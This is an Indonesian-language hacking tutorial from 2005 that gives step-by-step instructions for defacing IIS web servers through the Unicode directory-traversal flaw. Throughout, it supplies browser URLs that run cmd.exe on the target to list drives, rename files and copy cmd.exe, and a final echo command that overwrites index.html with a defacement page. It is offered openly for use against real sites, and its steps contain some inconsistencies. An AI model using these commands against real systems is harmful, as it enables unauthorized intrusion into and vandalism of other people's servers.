| Home | About | Hacking | Download | Komputer | Link | Lain-Lain |

Deface pAke Browser ...

Deface dengan Browser sangat menarik bagi "script kiddies", karena caranya sangat mudah dibandingkan lainnya.

Langkah-langkahnya adalah sebagai berikut :
  1. Pertama, buka browser Internet Explorer atau netscape Navigator
  2. Ketikkan di kolom addres internet explorer Anda: www.namaterget.com/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\

    3. Jika site ini benar-benar vulnerable, pada browser Anda akan ditampilkan :

    C:\winnt Inetpub
    .
    .
    .
    Dan seterusnya…

  3. Tahap berikutnya, carilah wwwroot pada target tadi. Wwwroot tidak selalu terletak di C:\ bisa juga D:\ atau E:\ atau F:\ bergantung pada letak webmaster atau administrator dari webserver tadi menaruh wwwroot -nya.
  4. Jika wwwroot nya terletak di c:\inetpub\wwwroot, segera mencari index.html dari target kita tadi. Setelah anda menemukan Index.html, segera nama di ubah menjadi Index.html, sebagai contoh, file aslinya default.html lalu kita rename menjadi index.html
  5. Setelah anda mengubah index.htm atau default.html, ketikkan perintah : www.namaterget.com/scripts/..%e0%80%af..winnt/system32/cmd.exe?/ c+ren+ c:\inetpub\ wwwroot\index.html+index-old.html
  6. Setelah anda masukkan perintah di atas, jika tidak ada tulisan "access denied" pada web browser anda, target kita bisa dilakukan defacing.accsess denied maksudnya adalah file tersebut ditetapkan read-only
  7. Langkah selanjutnya adalah melakukan pengkopian cmd.exe dari direktoric:\winnt\system32 ke suatu folder lain atau dalam folder yang sama dengan nama lain, misalnya cmdtarget.exe pada folder yang terletak di c:\winnt\system32, cukup ketikkan perintah berikut pada kolom address pada web browser anda :

www.namaterget.com/scripts/..%e0%80%af../winnt /system32/cmd.exe?/c+copy+c:\winnt\ system32\cmd.exe+c:\winnt\system32\cmdtarget.exe

Tujuan kita mengkopi dan mengubah cmd.exe menjadi cmdtarget.exe adalah agar kita bisa menjalankan perintah echo. Jika anda menggunakan cmd.exe, perintah echo tidak bisa digunakan untuk menulis atau membuat file. Sekarang kita sudah bisa melakukan defacing situs target. Selanjutnya, kita akan melakukan deface menggunakan perintah "echo". Cara seperti ini adalah cara yang paling mudah, karena kita tidak perlu upluad file ke webserver sasaran. Perintah echo dapat digunakan untuk menulis pesan dan kemudian disimpan ke suatu file. Misalkan, Anda akan deface situs sasaran dengan pesan:

cYbeR ObAke Was Here

Deface by Dirik0e

PATch YoUr SysteM NoW !!!

 

Ketikkan perintah sebagai berikut ini:

www.namatarget.com/scripts/..%c1%9c../winnt/system32/cmdku.exe?/c+echo++"<html> <head><title>DefacE by: Dirik0e </title></head><H1><marquee>cYbeR obAke Was Here </h1></marquee><br><br><br><body><h4>Deface By: DiRiK0e </h4><br><br><br><br><h2> PatCh YouR sYstEm NoW !!! </h2> "+>+c:\inetpub\wwwroot\index.html

 

Sekarang anda dapat membuka web yang telah anda deface. Jika file wwwroot files-nya bernama default.html, Akan segera terlihat hasilnya. Namun, jika anda tidak melihat hasilnya, wwwroot files-nya bukan bernama default.html. Sebenarnya, banyak sekali nama file wwwrootnya, seperti index.htm, index.asp, default.htm,atau file lain yang telah ditentukan oleh si webmaster dari webserver tersebut

 

 

Copyright (c) Roeshlee - 2005, Yogyakarta, Indonesia, All right reserved

 

 

Hosted by www.Geocities.ws

1